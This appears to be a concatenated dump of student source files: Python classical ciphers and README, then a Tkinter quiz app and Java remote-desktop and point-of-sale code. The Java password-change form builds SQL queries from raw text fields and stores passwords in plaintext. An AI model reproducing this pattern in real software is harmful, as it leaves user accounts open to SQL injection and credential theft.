if chr(ascii) not in fivexfive_key:\n if chr(ascii) != 'i' and chr(ascii) != 'j':\n fivexfive_key[tmp] = chr(ascii)\n tmp = tmp + 1\n else:\n if not i_or_j:\n fivexfive_key[tmp] = chr(ascii)\n tmp = tmp + 1\n i_or_j = True\n ascii = ascii + 1\n \n plaintext = list()\n plaintext = [0] * len(ciphertext)\n for x in range(0, len(ciphertext), 2):\n first = ciphertext[x]\n second = ciphertext[x+1]\n first_location = int(fivexfive_key.index(first))\n second_location = int(fivexfive_key.index(second))\n first_row = int(first_location / 5)\n second_row = int(second_location / 5)\n first_colmn = fivexfive_key.index(first) % 5\n second_colmn = fivexfive_key.index(second) % 5\n if first_row == second_row:\n first_colmn = first_colmn - 1\n second_colmn = second_colmn - 1\n \n if (first_colmn >= 0):\n plaintext[x] = fivexfive_key[first_location - 1]\n else:\n plaintext[x] = fivexfive_key[first_location + 4]\n \n if (second_colmn >= 0):\n plaintext[x+1] = fivexfive_key[second_location - 1]\n else:\n plaintext[x+1] = fivexfive_key[second_location + 4]\n elif first_colmn == second_colmn:\n first_row = first_row - 1\n second_row = second_row - 1\n \n if (first_row >= 0):\n plaintext[x] = fivexfive_key[first_location - 5]\n else:\n plaintext[x] = fivexfive_key[first_location + 20]\n \n if (second_row >= 0):\n plaintext[x+1] = fivexfive_key[second_location - 5]\n else:\n plaintext[x+1] = fivexfive_key[second_location + 20]\n \n elif first_colmn > second_colmn:\n plaintext[x] = fivexfive_key[first_location - (first_colmn - second_colmn)]\n plaintext[x + 1] = fivexfive_key[second_location + (first_colmn - second_colmn)]\n elif first_colmn < second_colmn:\n plaintext[x] = fivexfive_key[first_location + (second_colmn - first_colmn)]\n plaintext[x + 1] = fivexfive_key[second_location - (second_colmn - first_colmn)]\n results = ''.join(plaintext)\n return results\n \n"
},
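The bulk of plf above goes into building the 5x5 key square (once for encrypt, once for decrypt). As a standalone sketch, the square can be built in a few lines. One assumption differs from plf: this version always folds 'j' into 'i', the most common Playfair convention, whereas plf keeps whichever of i/j it encounters first:

```python
def key_square(key):
    square = []
    for c in key.lower() + 'abcdefghiklmnopqrstuvwxyz':  # alphabet omits 'j'
        c = 'i' if c == 'j' else c
        if c not in square:
            square.append(c)
    return square  # square[r * 5 + c] is row r, column c

print(''.join(key_square('monarchy')))  # monarchybdefgiklpqstuvwxz
```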
{
"alpha_fraction": 0.43294116854667664,
"alphanum_fraction": 0.45588234066963196,
"avg_line_length": 26.852458953857422,
"blob_id": "a25ce030557ea7b6f31c782d582837b734ebb568",
"content_id": "c8e1a009cdc4a7275803b817f119dd42991d293d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1700,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 61,
"path": "/vigenere.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"VigenereCipher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\n\nclass vig(cipher_interface):\n \n def bool_set_key(self):\n if self.key.isalpha():\n return True\n else:\n return False\n \n def encrypt(self):\n plaintext = list(self.text)\n ciphertext = [0] * len(plaintext)\n key_num = [0] * len(self.key)\n key = self.key\n i = 0\n for x in key:\n key_num[i] = int(ord(x) - 97)\n i += 1\n i = 0\n text_loop = 0\n for x in plaintext:\n if text_loop == len(key):\n text_loop = 0\n ascii = (ord(x) + key_num[text_loop]) % 123\n text_loop += 1\n if ascii < 97:\n ascii += 97\n ciphertext[i] = chr(ascii)\n i += 1\n results = ''.join(ciphertext)\n return results\n \n def decrypt(self): \n ciphertext = list(self.text)\n\n plaintext = [0] * len(ciphertext)\n key = self.key\n i = 0\n text_loop = 0\n for x in ciphertext:\n if text_loop == len(key):\n text_loop = 0\n if ord(key[text_loop]) > abs(ord(x)):\n ascii = (abs((ord(key[text_loop])) - 123) + (ord(x)))\n plaintext[i] = chr(ascii)\n else:\n ascii = (abs(ord(x) - ord(key[text_loop]))) % 123\n plaintext[i] = chr(ascii + 97)\n text_loop += 1\n\n i += 1\n results = ''.join(plaintext)\n return results \n"
},
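A round-trip check of vig (hypothetical inputs), using the classic Vigenère test vector 'attackatdawn' under key 'lemon':

```python
from vigenere import vig

ct = vig('lemon', 'attackatdawn').encrypt()
print(ct)                                        # lxfopvefrnhr
assert vig('lemon', ct).decrypt() == 'attackatdawn'
```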
{
"alpha_fraction": 0.43775302171707153,
"alphanum_fraction": 0.4524291455745697,
"avg_line_length": 28.492536544799805,
"blob_id": "d8d1702d01df174a08e5e61aa3d2bb280f85c76a",
"content_id": "0a6412e73d79f982bac24c2df2159fa3d8f74249",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1976,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 67,
"path": "/rail.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"Rail Fence Cipher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\n\nclass rl(cipher_interface):\n \n def bool_set_key(self):\n if self.key.isdigit() and int(self.key) > 0:\n return True\n else:\n return False\n\n def encrypt(self):\n plaintext = list(self.text)\n ciphertext = [0] * len(plaintext)\n key = int(self.key)\n tmp = 0\n if int(len(plaintext)) <= int(key):\n letter_per_row = 1\n xtra_letters = 0\n else:\n letter_per_row = int(len(plaintext)/key)\n xtra_letters = int(len(plaintext) % key)\n for x in range (0, key):\n y = 0\n if xtra_letters > 0:\n additional = 1\n else:\n additional = 0\n while y < letter_per_row + additional:\n ciphertext[tmp] = plaintext[x + key*y]\n tmp += 1\n y += 1\n if tmp == int(len(plaintext)):\n break\n xtra_letters -= 1 \n results = ''.join(ciphertext)\n return results\n \n def decrypt(self):\n ciphertext = list(self.text)\n plaintext = [0] * len(ciphertext)\n key = int(self.key)\n x = 0\n index = 0\n range = int(len(plaintext)/key)\n while x <= range:\n y = 0\n if index == len(ciphertext):\n break \n while y < key:\n if index == len(ciphertext):\n break\n if y == 0:\n plaintext[index]= ciphertext[x + range*y]\n else:\n plaintext[index]= ciphertext[x + range*y + 1]\n index += 1\n y += 1\n x += 1\n results = ''.join(plaintext)\n return results\n"
},
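Note that rl reads the text off in interleaved columns rather than the classic zigzag rail fence: with key k the ciphertext is text[0::k] + text[1::k] + .... A round-trip check (hypothetical inputs):

```python
from rail import rl

ct = rl('3', 'wearediscovered').encrypt()
print(ct)                                           # wrioreesveadced
assert rl('3', ct).decrypt() == 'wearediscovered'
```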
{
"alpha_fraction": 0.7513172030448914,
"alphanum_fraction": 0.7534246444702148,
"avg_line_length": 34.074073791503906,
"blob_id": "841f1b3e1809bbb523743d60fad32fafec51367e",
"content_id": "d1408829bb4654ed8f7be3f35e93a95cb12c47b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 949,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 27,
"path": "/Readme.txt",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "Paul Smith\[email protected]\nPython\nNo Extra Credit\n\n# Cipher\n\nCipher is a program that reads the input file, encrypts/decrypts the file contents using the specified key\nand cipher, and writes the encypted/decrypted contents to the specific file.\n\n## Use Instructions: Command Line Instructions\n\npython3 cipher.py [-h] {plf,rts,rfc,vig,ces} key {enc,dec} inputfile outputfile\n\n -h: help options\n\n {plf,rts,rfc,vig,ces}: First input is 3 letters for choosing which cipher you would like to choose\n\n key: The second imput is for the key that you would like to use with the chosen cipher\n\n {enc,dec}: The third input is for choosing whether you would like to encrypt or decrypt\n\n inputfile: The fourth input is for the name of the file with your message\n\n outputfile: The fith input is for the name of the destination file where your ciphertext will be saved\n\n Note: Input and output files should be in the same location as the python files\n\n"
}
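A concrete invocation (hypothetical file names) that Caesar-encrypts message.txt with a shift of 3 and then decrypts the result:

```
python3 cipher.py ces 3 enc message.txt out.txt
python3 cipher.py ces 3 dec out.txt restored.txt
```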
] | 8 |
VedantMahajan99/personal-projects-2018-19
|
https://github.com/VedantMahajan99/personal-projects-2018-19
|
c602f31b736afb15f4239e3492b7fc3583f539d0
|
f42963090c25c166174548c5e96993cb35019705
|
b2ea3f9e7e526f7470370386fd438dd412c31444
|
refs/heads/master
| 2022-06-29T17:44:56.332820 | 2020-05-12T06:55:14 | 2020-05-12T06:55:14 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5551744103431702,
"alphanum_fraction": 0.5906231999397278,
"avg_line_length": 35.4375,
"blob_id": "d9a97e1e747d0cf96769d784f6826ae6872cf0da",
"content_id": "a0a196f1f21119f7224b24dbf84edd21f22317d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1749,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 48,
"path": "/who_wants_to_be_the_millionare/kbc2.py",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "from finalform import *\nfrom tkinter import *\nfrom tkinter.messagebox import *\nfrom ttkthemes import themed_tk as tk\nfrom tkinter import ttk\nclass kbc2:\n def play_game(self):\n # self.root.destroy()\n self.fw_kbc = kbc3(self.root)\n def exit(self):\n msgbox = askquestion('Exit application', 'Are you sure you want to exit')\n if msgbox=='yes':\n self.root.destroy()\n\n def __init__(self):\n # root = Tk()\n self.root=tk.ThemedTk()\n self.root.get_themes()\n # self.root.set_theme('clam')\n self.root.set_theme('radiance')\n self.root.geometry(\"{0}x{0}+0+0\".format(self.root.winfo_screenwidth(), self.root.winfo_screenheight()))\n # self.root.attributes('-fullscreen', True)\n self.root.config(background=\"#090035\")\n self.pannel1 = PanedWindow(self.root, bg='#090035')\n self.pannel2 = PanedWindow(self.root, bg='#090035')\n self.pannel1.pack()\n self.pannel2.pack()\n dp_logo = PhotoImage(file=\"img/que.png\")\n Label(self.pannel1, image=dp_logo, bg='#090035').grid(row= 0, column=0)\n\n dp_rules = PhotoImage(file=\"img/rules.png\")\n Label(self.pannel1, image=dp_rules, bg='#090035').grid(row=0, column= 1, padx =50)\n\n pic_play = PhotoImage(file=\"img/play1.png\")\n pic_quit = PhotoImage(file=\"img/quit1.png\")\n bt_logo = ttk.Button(self.pannel2, image=pic_play, width=60,command=self.play_game)\n bt_rules = ttk.Button(self.pannel2, image=pic_quit, command=self.exit, width=60)\n\n\n bt_logo.pack(pady=10)\n bt_rules.pack(pady=10)\n\n\n self.root.mainloop()\n#-----------------------------------------------------------\n# obj = kbc2()\nif __name__ == '__main__':\n kbc2()\n"
},
{
"alpha_fraction": 0.5683296918869019,
"alphanum_fraction": 0.5699566006660461,
"avg_line_length": 26.84375,
"blob_id": "c1994b716874ac6f1325113b3eb8657bb78a0c16",
"content_id": "7d413ca47a8e2fa6cceba00832d7fc9e0528297c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1844,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 64,
"path": "/TeamViewer/screenshot.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "import java.awt.AWTException;\r\nimport java.awt.Rectangle;\r\nimport java.awt.Robot;\r\nimport java.awt.Toolkit;\r\nimport java.awt.image.BufferedImage;\r\nimport java.io.File;\r\nimport java.io.IOException;\r\nimport java.util.logging.Level;\r\nimport java.util.logging.Logger;\r\nimport javax.imageio.ImageIO;\r\n\r\n/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\n\r\n/**\r\n *\r\n * @author vedantmahajan\r\n */\r\npublic class screenshot {\r\n \r\n \r\n public static void main(String[] args) \r\n {\r\n \r\n \r\n { \r\n try { \r\n Thread.sleep(120);\r\n } catch (InterruptedException ex) {\r\n Logger.getLogger(screenshot.class.getName()).log(Level.SEVERE, null, ex);\r\n }\r\n Robot r = null; \r\n try {\r\n r = new Robot();\r\n } catch (AWTException ex) {\r\n Logger.getLogger(screenshot.class.getName()).log(Level.SEVERE, null, ex);\r\n }\r\n \r\n // It saves screenshot to desired path \r\n String path = \"src/pics/screenshot.jpg\"; \r\n \r\n // Used to get ScreenSize and capture image \r\n Rectangle capture = \r\n new Rectangle(Toolkit.getDefaultToolkit().getScreenSize()); \r\n BufferedImage Image = r.createScreenCapture(capture); \r\n try { \r\n ImageIO.write(Image, \"jpg\", new File(path));\r\n } catch (IOException ex) {\r\n Logger.getLogger(screenshot.class.getName()).log(Level.SEVERE, null, ex);\r\n }\r\n System.out.println(\"Screenshot saved\"); \r\n } \r\n \r\n }\r\n \r\n \r\n// catch (AWTException | IOException | InterruptedException ex) { \r\n// System.out.println(ex); \r\n// } \r\n \r\n}"
},
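screenshot.java captures the screen with java.awt.Robot.createScreenCapture and writes it with ImageIO. For comparison, a Python sketch of the same screen-capture idea, assuming the Pillow package is installed (not something the repo itself uses):

```python
from PIL import ImageGrab

def save_screenshot(path="screenshot.jpg"):
    image = ImageGrab.grab()           # grabs the full screen
    image.convert("RGB").save(path)    # JPEG requires RGB, not RGBA
    print("Screenshot saved")

save_screenshot()
```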
{
"alpha_fraction": 0.6156436204910278,
"alphanum_fraction": 0.632478654384613,
"avg_line_length": 37.60499954223633,
"blob_id": "fea9e270aee9079da57ad3d9aaa8c62f83259e52",
"content_id": "8e8c70a13929fc6bbad699d7fdaf9856b9702f16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 7722,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 200,
"path": "/Point_Of_Sale-in_java/src/changepass.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.swing.JOptionPane;\nimport sun.security.util.Password;\n\n/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choose Tools | Templates\n * and open the template in the editor.\n */\n\n/**\n *\n * @author vedantmahajan\n */\npublic class changepass extends javax.swing.JFrame {\n\n String global_username;\n \n /**\n * Creates new form changepass\n */\n public changepass(String global_username) {\n initComponents();\n \n this.global_username = this.global_username;\n \n setSize(500,500);\n \n }\n\n /**\n * This method is called from within the constructor to initialize the form.\n * WARNING: Do NOT modify this code. The content of this method is always\n * regenerated by the Form Editor.\n */\n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jLabel1 = new javax.swing.JLabel();\n jLabel2 = new javax.swing.JLabel();\n jLabel3 = new javax.swing.JLabel();\n jLabel4 = new javax.swing.JLabel();\n jLabel5 = new javax.swing.JLabel();\n lb_username_changepass = new javax.swing.JTextField();\n lb_oldpass = new javax.swing.JTextField();\n lb_newpass = new javax.swing.JTextField();\n lb_confirmpass = new javax.swing.JTextField();\n jButton1 = new javax.swing.JButton();\n\n jLabel1.setText(\"jLabel1\");\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n getContentPane().setLayout(null);\n\n jLabel2.setText(\"USERNAME :\");\n getContentPane().add(jLabel2);\n jLabel2.setBounds(40, 40, 110, 16);\n\n jLabel3.setText(\"OLD PASSWORD :\");\n getContentPane().add(jLabel3);\n jLabel3.setBounds(40, 100, 130, 16);\n\n jLabel4.setText(\"NEW PASSWORD :\");\n getContentPane().add(jLabel4);\n jLabel4.setBounds(40, 160, 120, 16);\n\n jLabel5.setText(\"CONFIRM PASSWORD :\");\n getContentPane().add(jLabel5);\n jLabel5.setBounds(40, 210, 160, 16);\n\n lb_username_changepass.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n lb_username_changepassActionPerformed(evt);\n }\n });\n getContentPane().add(lb_username_changepass);\n lb_username_changepass.setBounds(230, 40, 110, 26);\n\n lb_oldpass.setText(\"jTextField2\");\n lb_oldpass.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n lb_oldpassActionPerformed(evt);\n }\n });\n getContentPane().add(lb_oldpass);\n lb_oldpass.setBounds(230, 90, 80, 26);\n\n lb_newpass.setText(\"jTextField3\");\n getContentPane().add(lb_newpass);\n lb_newpass.setBounds(230, 150, 80, 26);\n\n lb_confirmpass.setText(\"jTextField4\");\n getContentPane().add(lb_confirmpass);\n lb_confirmpass.setBounds(230, 210, 80, 26);\n\n jButton1.setText(\"CONFIRM\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(130, 260, 103, 29);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void lb_username_changepassActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_lb_username_changepassActionPerformed\n // TODO add your handling code here:\n }//GEN-LAST:event_lb_username_changepassActionPerformed\n\n private void 
lb_oldpassActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_lb_oldpassActionPerformed\n        // TODO add your handling code here:\n    }//GEN-LAST:event_lb_oldpassActionPerformed\n\n    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n        \n        // Validate input before touching the database; the original's\n        // .equals(null) checks were always false, and failed checks did not\n        // stop the update.\n        if ((lb_newpass.getText()).isEmpty() || (lb_oldpass.getText()).isEmpty() || (lb_confirmpass.getText()).isEmpty())\n        {\n            JOptionPane.showMessageDialog(rootPane, \"ALL FIELDS ARE NECESSARY !\");\n            return;\n        }\n        \n        if((lb_confirmpass.getText()).equals(lb_newpass.getText()) == false)\n        {\n            JOptionPane.showMessageDialog(rootPane, \"RE-CHECK PASSWORD !\");\n            return;\n        }\n        \n        ResultSet resultset_obj = DBLoader.executeQuery(\"select * from adminlogin where USERNAME = '\" + (lb_username_changepass.getText()) +\"' and PASSWORD = '\" + (lb_oldpass.getText()) +\"'\");\n        \n        try {\n            if(resultset_obj.next())\n            {\n                resultset_obj.updateString(\"PASSWORD\", lb_confirmpass.getText());\n                \n                resultset_obj.updateRow();\n                \n                JOptionPane.showMessageDialog(rootPane, \"PASSWORD CHANGED !\");\n            }\n        } \n        catch (SQLException ex) \n        {\n            Logger.getLogger(changepass.class.getName()).log(Level.SEVERE, null, ex);\n        }\n        \n    }//GEN-LAST:event_jButton1ActionPerformed\n\n    /**\n     * @param args the command line arguments\n     */\n    public static void main(String args[]) {\n        /* Set the Nimbus look and feel */\n        //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n        /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n         * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n         */\n        try {\n            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n                if (\"Nimbus\".equals(info.getName())) {\n                    javax.swing.UIManager.setLookAndFeel(info.getClassName());\n                    break;\n                }\n            }\n        } catch (ClassNotFoundException ex) {\n            java.util.logging.Logger.getLogger(changepass.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n        } catch (InstantiationException ex) {\n            java.util.logging.Logger.getLogger(changepass.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n        } catch (IllegalAccessException ex) {\n            java.util.logging.Logger.getLogger(changepass.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n        } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n            java.util.logging.Logger.getLogger(changepass.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n        }\n        //</editor-fold>\n\n        /* Create and display the form */\n        java.awt.EventQueue.invokeLater(new Runnable() {\n            public void run() {\n                //new changepass().setVisible(true);\n            }\n        });\n    }\n\n    // Variables declaration - do not modify//GEN-BEGIN:variables\n    private javax.swing.JButton jButton1;\n    private javax.swing.JLabel jLabel1;\n    private javax.swing.JLabel jLabel2;\n    private javax.swing.JLabel jLabel3;\n    private javax.swing.JLabel jLabel4;\n    private javax.swing.JLabel jLabel5;\n    private javax.swing.JTextField lb_confirmpass;\n    private javax.swing.JTextField lb_newpass;\n    private javax.swing.JTextField lb_oldpass;\n    public javax.swing.JTextField lb_username_changepass;\n    // End of variables declaration//GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.5387989282608032,
"alphanum_fraction": 0.5525848269462585,
"avg_line_length": 37.449798583984375,
"blob_id": "dff3b6e3845fe0116f08be19f093e65e5f6c0149",
"content_id": "a3150d790f9e110d87a5416673ee772fcd56a6af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 9575,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 249,
"path": "/TeamViewer/maincontroller.java",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "\nimport com.mashape.unirest.http.HttpResponse;\nimport com.mashape.unirest.http.Unirest;\nimport com.mashape.unirest.http.exceptions.UnirestException;\nimport java.awt.Graphics2D;\nimport java.awt.RenderingHints;\nimport java.awt.event.MouseAdapter;\nimport java.awt.event.MouseEvent;\nimport java.awt.image.BufferedImage;\nimport java.io.File;\nimport java.io.IOException;\nimport java.util.ArrayList;\nimport java.util.StringTokenizer;\nimport java.util.concurrent.ExecutionException;\nimport java.util.logging.Level;\nimport java.util.logging.Logger;\nimport javax.imageio.ImageIO;\nimport javax.swing.ImageIcon;\n\n\npublic class maincontroller extends javax.swing.JFrame\n{\n\n ArrayList<PCinfo> pclist = new ArrayList<>(); //this will store store all the info about all the pc's in the network in a arraylist \n public maincontroller()\n {\n initComponents();\n setSize(500, 500);\n }\n\n \n @SuppressWarnings(\"unchecked\")\n // <editor-fold defaultstate=\"collapsed\" desc=\"Generated Code\">//GEN-BEGIN:initComponents\n private void initComponents() {\n\n jButton1 = new javax.swing.JButton();\n jScrollPane1 = new javax.swing.JScrollPane();\n jPanel1 = new javax.swing.JPanel();\n\n setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);\n setBackground(new java.awt.Color(0, 0, 153));\n getContentPane().setLayout(null);\n\n jButton1.setText(\"Connect\");\n jButton1.addActionListener(new java.awt.event.ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n jButton1ActionPerformed(evt);\n }\n });\n getContentPane().add(jButton1);\n jButton1.setBounds(390, 30, 140, 40);\n\n jPanel1.setBackground(new java.awt.Color(102, 102, 255));\n\n javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);\n jPanel1.setLayout(jPanel1Layout);\n jPanel1Layout.setHorizontalGroup(\n jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\n .addGap(0, 868, Short.MAX_VALUE)\n );\n jPanel1Layout.setVerticalGroup(\n jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)\n .addGap(0, 498, Short.MAX_VALUE)\n );\n\n jScrollPane1.setViewportView(jPanel1);\n\n getContentPane().add(jScrollPane1);\n jScrollPane1.setBounds(10, 110, 870, 500);\n\n pack();\n }// </editor-fold>//GEN-END:initComponents\n\n private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed\n detect d = new detect();\n Thread t = new Thread(d);\n t.start();\n }//GEN-LAST:event_jButton1ActionPerformed\n public class detect implements Runnable //\"implements runnable\" will convert a class into thread\n {\n\n @Override\n public void run()\n {\n int count = 1;\n for (int i=1; i<=15;i++)\n {\n Thread tarr[] = new Thread[17]; // an array of thread types so the request is generated to 17 systems at the same time to work faster\n for (int j=0; j<17; j++)\n {\n connect c = new connect(count+\"\");\n tarr[j] = new Thread(c);\n tarr[j].start(); //starts the thread\n count++;\n }\n for (int k=0; k<17;k++)\n {\n try\n {\n tarr[k].join(); // will join 17 threads used at a time\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n \n }\n }\n }\n \n \n }\n public class connect implements Runnable\n {\n String ip;\n connect(String ip)\n {\n this.ip = ip;\n }\n\n @Override\n public void run() \n {\n try\n {\n HttpResponse<String> httpres = Unirest.get(\"http://\"+crdentials.ipadd+ip+\":8888/connect\").asString();\n String res = httpres.getBody();\n if(res!=null)\n {\n StringTokenizer st = new 
StringTokenizer(res,\",\");\n String pcname = st.nextToken();\n String os = st.nextToken();\n \n String pic = \"\";\n if(os.contains(\"Windows\"))\n {\n pic = \"src/pics/window.png\";\n }\n else if(os.contains(\"Mac\"))\n {\n pic = \"src/pics/mac.png\";\n }\n else\n {\n pic = \"src/pics/linux.jpg\";\n }\n \n pclist.add(new PCinfo (pcname, crdentials.ipadd+ip, os, pic));\n System.out.println(pclist.size());\n createpanel();\n }\n \n System.out.println(res);\n }\n catch(Exception e)\n {\n// e.printStackTrace();\n }\n }\n \n \n }\n public void createpanel() throws IOException\n {\n jPanel1.removeAll(); //name of the panel in it sdesign. the command is if there is something already this will remove it \n jPanel1.repaint(); //this will refresh the whole panel\n int x = 10,y = 10; // these values are temporarily given the bounds of single label which we'll have to change aftrewords \n clientpanel sp[] = new clientpanel[pclist.size()]; //an array of type clientpanel(the class where one sample apnel is created)is created where the size is same as the array list\n for (int i = 0; i < pclist.size(); i++)\n {\n sp[i] = new clientpanel();\n sp[i].setBounds(x, y, 300, 250);\n sp[i].ip.setText(pclist.get(i).ip); //we are getting all the variables stored in client panel now in array\n sp[i].pcname.setText(pclist.get(i).pcname);\n String pic = pclist.get(i).photo;\n BufferedImage img = ImageIO.read(new File (pic));\n BufferedImage obj = resize(img, sp[i].jLabel3.getWidth(), sp[i].jLabel3.getHeight());\n sp[i].jLabel3.setIcon(new ImageIcon(img));\n jPanel1.add(sp[i]);\n String total_ip = pclist.get(i).ip;\n sp[i].addMouseListener(new MouseAdapter() {\n @Override\n public void mouseClicked(MouseEvent e) {\n if(e.getClickCount()== 2){\n homescreen obj = new homescreen(total_ip);\n obj.setVisible(true);\n }\n \n }\n \n });\n x = x+350;\n if(x>1000)\n {\n y = y+270;\n }\n jPanel1.repaint();\n \n }\n }\n public static BufferedImage resize(BufferedImage img, int newW, int newH) { \n int w = img.getWidth(); \n int h = img.getHeight(); \n BufferedImage dimg = new BufferedImage(newW, newH, img.getType()); \n Graphics2D g = dimg.createGraphics(); \n g.setRenderingHint(RenderingHints.KEY_INTERPOLATION,\n RenderingHints.VALUE_INTERPOLATION_BILINEAR); \n g.drawImage(img, 0, 0, newW, newH, 0, 0, w, h, null); \n g.dispose(); \n return dimg; \n}\n \n public static void main(String args[]) {\n /* Set the Nimbus look and feel */\n //<editor-fold defaultstate=\"collapsed\" desc=\" Look and feel setting code (optional) \">\n /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.\n * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html \n */\n try {\n for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {\n if (\"Nimbus\".equals(info.getName())) {\n javax.swing.UIManager.setLookAndFeel(info.getClassName());\n break;\n }\n }\n } catch (ClassNotFoundException ex) {\n java.util.logging.Logger.getLogger(maincontroller.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (InstantiationException ex) {\n java.util.logging.Logger.getLogger(maincontroller.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (IllegalAccessException ex) {\n java.util.logging.Logger.getLogger(maincontroller.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n } catch (javax.swing.UnsupportedLookAndFeelException ex) {\n 
java.util.logging.Logger.getLogger(maincontroller.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);\n }\n //</editor-fold>\n\n /* Create and display the form */\n java.awt.EventQueue.invokeLater(new Runnable() {\n public void run() {\n new maincontroller().setVisible(true);\n }\n });\n }\n\n // Variables declaration - do not modify//GEN-BEGIN:variables\n private javax.swing.JButton jButton1;\n private javax.swing.JPanel jPanel1;\n private javax.swing.JScrollPane jScrollPane1;\n // End of variables declaration//GEN-END:variables\n}\n"
},
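maincontroller scans 255 LAN addresses by sending GET http://&lt;ip&gt;:8888/connect from hand-managed batches of 17 threads. A Python sketch of the same probe using a thread pool; the subnet prefix is a placeholder, as crdentials.ipadd is in the Java code:

```python
from concurrent.futures import ThreadPoolExecutor
import urllib.request

def probe(ip):
    try:
        with urllib.request.urlopen(f"http://{ip}:8888/connect", timeout=1) as r:
            return ip, r.read().decode()   # "pcname,os" on success
    except OSError:
        return None                        # host down or port closed

PREFIX = "192.168.1."                      # placeholder subnet
with ThreadPoolExecutor(max_workers=17) as pool:
    for hit in pool.map(probe, (PREFIX + str(i) for i in range(1, 256))):
        if hit:
            print(hit)
```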
{
"alpha_fraction": 0.8026315569877625,
"alphanum_fraction": 0.8026315569877625,
"avg_line_length": 56,
"blob_id": "0aac7526d1bc54aaee89f53f65bc3380ad2abcdb",
"content_id": "f7866813e70491fcb5d77a7118d415a6254a3e43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 230,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 4,
"path": "/TeamViewer/README.md",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
